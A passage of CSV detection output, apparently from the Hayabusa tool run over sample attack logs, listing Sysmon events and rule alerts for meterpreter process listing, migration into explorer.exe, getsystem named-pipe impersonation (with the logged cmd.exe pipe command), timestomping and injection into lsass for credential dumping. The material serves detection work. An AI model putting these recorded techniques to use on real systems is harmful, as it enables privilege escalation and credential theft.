+00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001020BA0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | 
Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | 
Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 
+00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.914 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001017C50600,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 365ABB72-F797-5CC7-0000-00105AF70A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 
365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: 
C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | 
Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:23:00.930 +00:00,IEWIN7,10,low,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/proc_access_win_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 07:26:34.133 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx +2019-04-30 07:46:15.215 +00:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 07:46:15.215 +00:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation_sysmon/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 07:46:15.215 +00:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation_sysmon/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 07:46:15.215 +00:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 10:12:45.583 +00:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx +2019-04-30 10:13:42.052 +00:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 12:43:43.784 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 
